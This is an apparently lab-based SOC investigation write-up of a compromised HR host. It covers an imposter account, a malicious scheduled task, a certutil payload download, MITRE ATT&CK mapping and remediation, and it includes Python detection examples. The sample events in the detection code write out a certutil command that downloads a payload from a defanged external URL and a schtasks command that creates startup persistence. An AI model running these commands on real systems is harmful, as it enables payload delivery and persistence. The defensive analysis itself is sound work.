This repository documents a hands-on SOC investigation focused on identifying, analyzing, and responding to suspicious process execution activity on a host within the HR department. The project follows a real-world Blue Team workflow, including log ingestion, alert triage, user behavior analysis, LOLBIN and scheduled task investigation, network activity analysis, and threat intelligence correlation.
An IDS alert indicated suspicious process execution on a host in the HR department, suggesting a potential compromise. Analysis revealed the execution of tools commonly associated with network information gathering and scheduled task creation, confirming malicious behavior.
Due to limited resources, only Windows process creation logs (Event ID 4688) were collected and ingested into Splunk under the win_eventlogs index for further investigation.
The organization’s network is divided into three departments:
IT Department
- James
- Moin
- Katrina
HR Department
- Haroon
- Chris
- Diana
Marketing Department
- Bell
- Amelia
- Deepak
This segmentation was used to correlate suspicious activity to specific departments and users during the investigation.
This project focuses on the full investigation and triage of suspicious process execution to determine whether it represents legitimate activity or malicious compromise within the HR department host.
Investigation Workflow Overview:
- 🖥️ Log Collection & Ingestion – Gather Windows process execution logs (Event ID 4688) and ingest them into Splunk for structured analysis
- 🔍 Alert Analysis & Triage – Review IDS alerts to identify hosts and processes of interest
- 👤 User Activity Correlation – Map observed activity to network segmentation and departmental users to detect anomalous behavior and imposters
- 🛠️ Scheduled Task & LOLBIN Investigation – Identify execution of Living-off-the-Land Binaries (LOLBINs) and scheduled tasks used for reconnaissance or payload delivery
- 🌐 Network & Host Analysis – Determine which third-party sites were accessed, files downloaded, and endpoint artifacts present
- 📂 Artifact Collection & Evidence Documentation – Extract downloaded files, record filenames, hashes, and other indicators of compromise for further triage
- 📑 Reporting & MITRE ATT&CK Mapping – Document investigation findings, correlate with MITRE ATT&CK tactics and techniques, and provide actionable recommendations
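The user activity correlation step above, worked as an added example in Python (this is not code from the repository; its own SPL is in the referenced Splunk_Queries files). It takes usernames from 4688 process-creation events, strips the domain prefix, folds digit-for-letter substitutions, and checks them against the departmental roster so that an imposter such as Amel1a is flagged as a lookalike of Amelia rather than passing as an unknown account. The sample events, the CORP domain prefix, and the 0.8 similarity threshold are assumptions made for illustration.

```python
"""Lookalike-username check over Windows 4688 process-creation events.

Added example, not part of the original repository. The roster comes from
the departmental segmentation in the README; the events, the CORP domain
prefix and the 0.8 similarity threshold are constructed assumptions.
"""
from difflib import SequenceMatcher

# Departmental roster: department -> legitimate usernames (from the README).
ROSTER = {
    "IT": ["James", "Moin", "Katrina"],
    "HR": ["Haroon", "Chris", "Diana"],
    "Marketing": ["Bell", "Amelia", "Deepak"],
}

# Digit/symbol-for-letter substitutions commonly used to build lookalike names.
HOMOGLYPHS = str.maketrans(
    {"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "@": "a", "$": "s"}
)


def base_name(account: str) -> str:
    """Strip a DOMAIN\\ prefix and any '.suffix' (CORP\\Chris.fort -> Chris)."""
    return account.split("\\")[-1].split(".")[0]


def normalize(name: str) -> str:
    """Lower-case and fold homoglyph substitutions so Amel1a compares as amelia."""
    return name.lower().translate(HOMOGLYPHS)


def classify_user(account: str, roster=ROSTER, threshold: float = 0.8):
    """Return (status, department, roster_user).

    status is 'known' (exact roster match), 'lookalike' (near match after
    folding homoglyphs) or 'unknown' (no roster user resembles it).
    """
    base = base_name(account)
    norm = normalize(base)
    best_ratio, best_dept, best_user = 0.0, None, None
    for dept, users in roster.items():
        for user in users:
            if base.lower() == user.lower():
                return "known", dept, user
            ratio = SequenceMatcher(None, norm, normalize(user)).ratio()
            if ratio > best_ratio:
                best_ratio, best_dept, best_user = ratio, dept, user
    if best_ratio >= threshold:
        return "lookalike", best_dept, best_user
    return "unknown", None, None


# Constructed sample 4688 events (illustrative, not telemetry from the case).
SAMPLE_EVENTS = [
    {"time": "2022-03-05 12:54:30", "host": "HR_02", "user": "CORP\\Amel1a",
     "process": "C:\\Windows\\System32\\net.exe"},
    {"time": "2022-03-04 10:20:11", "host": "HR_02", "user": "CORP\\Chris.fort",
     "process": "C:\\Windows\\System32\\schtasks.exe"},
    {"time": "2022-03-04 10:30:02", "host": "HR_02", "user": "CORP\\Haroon",
     "process": "C:\\Windows\\System32\\certutil.exe"},
    {"time": "2022-03-04 09:01:55", "host": "HR_01", "user": "CORP\\svc_backup",
     "process": "C:\\Windows\\System32\\cmd.exe"},
]


def find_suspicious_users(events, roster=ROSTER):
    """Return one finding per event whose account is not on the roster."""
    findings = []
    for ev in events:
        status, dept, match = classify_user(ev["user"], roster)
        if status != "known":
            findings.append({"time": ev["time"], "host": ev["host"],
                             "user": ev["user"], "status": status,
                             "resembles": match, "department": dept})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_users(SAMPLE_EVENTS):
        print(finding)
```

A lookalike finding names the roster user and department it resembles, which is what the analyst needs to decide whether the account is a registration typo or an imposter; an unknown account (such as the constructed service account) is surfaced separately so it can be checked against the asset inventory rather than dismissed.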
All analysis was performed in a controlled environment to ensure safe handling of potentially malicious content.
- Splunk: SIEM platform used for log ingestion, querying, and correlation
- Windows Event Logs: Primary source of process execution information (Event ID 4688)
- Vim / Text Editors: Used to review raw log data and extract relevant information
- Oracle VirtualBox: Provided an isolated sandbox environment for safely handling and analyzing potentially malicious files and logs
- Splunk Query Editor: Used to build, test, and refine SPL queries for analysis of event logs and alert correlation
- Browser / Network Tools: Standard browsers and online tools (e.g., VirusTotal, WHOIS lookups) used for network artifact investigation, IP reputation, and malware source verification
- Total number of process execution logs ingested for March 2022: 13,959
- Query used: 📄 Detailed query explanation: see Splunk_Queries/01_log_ingestion_explained.md
- IDS alert identified suspicious process execution on HR host
- Suspicious username observed: Amel1a
- Timeline of suspicious processes: 3/5/22 12:54:30.000 PM
- Query used: 📄 Detailed query explanation: see Splunk_Queries/02_imposter_account_detection.md
- HR user observed running scheduled tasks: Chris.fort
- Query used: 📄 Detailed query explanation: see Splunk_Queries/03_scheduled_task_hr_user.md
- HR user executing LOLBIN to download payload: Haroon
- System process (LOLBIN) used: Certutil.exe
- Query used: 📄 Detailed query explanation: see Splunk_Queries/04_lolbin_payload_download.md
- Third-party site accessed: Controlc.com
- URL connected to by infected host: hxxps://controlc[.]com/e4d11035
- Query used: 📄 Detailed query explanation: see Splunk_Queries/05_Network_Analysis.md
- Date of binary execution: 3/4/22 10:38:28.000 AM
- File saved on host from C2 server: Benign.exe
- Query used: 📄 Detailed query explanation: see Splunk_Queries/06_Host_Analysis.md
- Imposter Username: Amel1a
- Legitimate Lookalike Username: Amelia
- Compromised User Account: Chris.fort
- Compromised User Account: Haroon
- Affected Department: Human Resources (HR)
- Affected Host: HR_02
- Malicious Scheduled Task Name: OfficUpdater
- Persistence Mechanism: Windows Scheduled Task (schtasks)
- LOLBIN Used: certutil.exe
- Downloaded Payload Name: Benign.exe
- Payload Execution Date: 2022-03-04
- Payload Execution Time: 10:38:28 AM
- External Domain Contacted: controlc[.]com
- External URL: https://controlc[.]com/e4d11035
- Payload Source Type: Third-party file hosting service
- Log Source: Windows Event Logs (Event ID 4688)
- T1036 – Masquerading
  Imposter account Amel1a closely resembled a legitimate user (Amelia), indicating account masquerading.
- T1078 – Valid Accounts
  Legitimate HR user accounts (Chris.fort, Haroon) were used to execute malicious activity.
- T1053.005 – Scheduled Task / Job: Scheduled Task
  A scheduled task (OfficUpdater) was created to establish persistence and execute a malicious binary on system startup.
- T1218 – Signed Binary Proxy Execution
  The native Windows utility certutil.exe was abused as a Living-off-the-Land Binary (LOLBIN) to bypass security controls.
- T1105 – Ingress Tool Transfer
  A payload (Benign.exe) was downloaded from an external source using certutil.exe.
- T1071 – Application Layer Protocol
  The infected host communicated with a third-party web service (controlc[.]com) over HTTP(S).
The investigation established that the suspicious process execution activity observed on HR department hosts was the result of a confirmed compromise. Analysis of Windows process creation logs (Event ID 4688) revealed multiple stages of attacker activity, including account masquerading, persistence establishment, and malicious payload delivery using native system utilities.
A suspicious imposter account (Amel1a) was identified during log review, closely resembling a legitimate user account (Amelia). Further analysis revealed abuse of valid HR user accounts (Chris.fort and Haroon) to execute scheduled tasks and download an external payload using the Living-off-the-Land Binary certutil.exe. The payload was retrieved from a third-party file-sharing service and successfully written to disk, confirming post-compromise activity.
Based on the collected evidence, the following actions are recommended:
- Immediate account remediation: Reset passwords and review access privileges for all affected and related HR user accounts, including monitoring for additional imposter or lookalike usernames.
- Persistence eradication: Identify and remove unauthorized scheduled tasks, including the task named OfficUpdater, and verify system startup configurations across HR hosts.
- LOLBIN abuse prevention: Restrict or monitor execution of high-risk native utilities such as certutil.exe through endpoint protection policies and application control.
- Network containment: Block identified external infrastructure, including the defanged domain controlc[.]com and associated URLs, at network security and proxy layers.
- Threat detection enhancement: Create and deploy SIEM correlation rules to detect scheduled task creation, certutil-based downloads, and execution of binaries from temporary user directories.
- Post-incident monitoring: Increase monitoring across HR department systems for signs of lateral movement, repeated execution attempts, or additional payload retrieval.
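The three correlation rules recommended above (scheduled task creation, certutil-based downloads, and execution of binaries from temporary user directories), worked as an added example in Python rather than as the repository's own Splunk queries. Each rule runs over 4688 process-creation events and tags hits with the technique ids mapped earlier in this report; the event dicts, their field names, and their command lines are constructed samples, and the two benign certutil and schtasks events show that the rules key on the download and creation arguments rather than on the binary name alone.

```python
"""Detection rules for the SIEM correlation recommendation, run over
Windows 4688 process-creation events.

Added example, not the repository's own Splunk queries. The event dicts
are constructed samples; their field names, hosts and command lines are
assumptions made for illustration.
"""
import re

# Image path inside a user's temporary directory.
TEMP_DIR_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.IGNORECASE)
# Plain or defanged URL scheme anywhere in a command line.
URL_RE = re.compile(r"\b(?:https?|hxxps?)://", re.IGNORECASE)


def image_name(path: str) -> str:
    """Return the lower-cased file name of a process image path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return a list of (technique, rule_name) hits for one 4688 event.

    Technique ids are the ones mapped in this report; the temp-directory
    rule carries no id because the report does not map one for it.
    """
    hits = []
    proc = image_name(ev["process"])
    cmd = ev.get("cmdline", "").lower()
    if proc == "schtasks.exe" and "/create" in cmd:
        hits.append(("T1053.005", "scheduled task creation via schtasks"))
    if proc == "certutil.exe" and "urlcache" in cmd and URL_RE.search(cmd):
        hits.append(("T1218 / T1105", "certutil.exe fetching a remote file"))
    if TEMP_DIR_RE.search(ev["process"]):
        hits.append((None, "binary executed from user temp directory"))
    return hits


def run_rules(events):
    """Apply check_event to every event and flatten the hits into findings."""
    findings = []
    for ev in events:
        for technique, rule in check_event(ev):
            findings.append({"time": ev["time"], "host": ev["host"],
                             "user": ev["user"], "rule": rule,
                             "technique": technique})
    return findings


# Constructed sample 4688 events (illustrative, not telemetry from the case).
SAMPLE_EVENTS = [
    {"time": "2022-03-04 10:20:11", "host": "HR_02", "user": "CORP\\Chris.fort",
     "process": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks /create /tn OfficUpdater /sc onstart "
                "/tr C:\\Users\\Chris.fort\\AppData\\Local\\Temp\\Benign.exe"},
    {"time": "2022-03-04 10:30:02", "host": "HR_02", "user": "CORP\\Haroon",
     "process": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f hxxps://controlc[.]com/e4d11035 "
                "C:\\Users\\Haroon\\AppData\\Local\\Temp\\Benign.exe"},
    {"time": "2022-03-04 10:38:28", "host": "HR_02", "user": "CORP\\Haroon",
     "process": "C:\\Users\\Haroon\\AppData\\Local\\Temp\\Benign.exe",
     "cmdline": "Benign.exe"},
    # Benign certutil use: no urlcache argument and no URL, so no hit.
    {"time": "2022-03-04 11:02:40", "host": "IT_01", "user": "CORP\\James",
     "process": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\server.cer"},
    # Benign schtasks use: a query, not a creation, so no hit.
    {"time": "2022-03-04 11:15:03", "host": "IT_01", "user": "CORP\\James",
     "process": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks /query /fo LIST"},
]


if __name__ == "__main__":
    for finding in run_rules(SAMPLE_EVENTS):
        print(finding)
```

The certutil rule requires both the cache argument and a URL so that routine certificate operations do not fire it, and the temp-directory rule keys on the image path of the process itself rather than on strings in the command line, which is why the schtasks and certutil events (whose command lines mention a temp path) produce one hit each and only the execution of Benign.exe produces the temp-directory hit.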
The incident was successfully investigated and documented using available host-based telemetry. All identified Indicators of Compromise (IOCs), including user accounts, command-line artifacts, file names, and external URLs, have been preserved for SOC reporting and future detection. The case has been formally closed following validation of findings and implementation of recommended remediation actions.